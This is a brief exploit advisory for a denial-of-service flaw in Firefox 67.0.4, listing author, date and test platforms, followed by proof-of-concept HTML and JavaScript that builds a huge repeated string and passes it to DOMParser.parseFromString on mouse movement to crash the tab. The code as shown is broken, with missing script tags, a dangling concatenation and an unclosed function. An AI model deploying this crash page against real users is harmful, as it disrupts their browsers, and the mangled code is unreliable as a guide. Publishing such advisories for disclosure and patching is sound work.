Firefox 67.0.4 Denial Of Service

Firefox version 67.0.4 suffers from a denial of service vulnerability.

MD5 | 6428d159c5f24ca3c60a544bdba585ec

Exploit Title: DOMParser Denial of Service on Firefox 67.0.4

Date: 09/07/2019

Description: pass a huge string as an argument to DOMParser.parseFromString will crash the tab in Firefox version 67.0.4.

Exploit Author:Tejas Ajay Naik

Vendor Homepage:

Software Link:

Version: 67.0.4

Tested On: Linux x86,Windows x64 1803

<!DOCTYPE html>
Loading please wait

function MyFun() {

var text = [];
for(var i=0 ;i<300 ; ++i)
text += "<\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70><\x70>"+
var domparser = new DOMParser();
var doc = domparser.parseFromString(text,"application/xhtml+xml");


<input type="button" onmousemove="MyFun()" value="click"/>
<p id="demo"></p>

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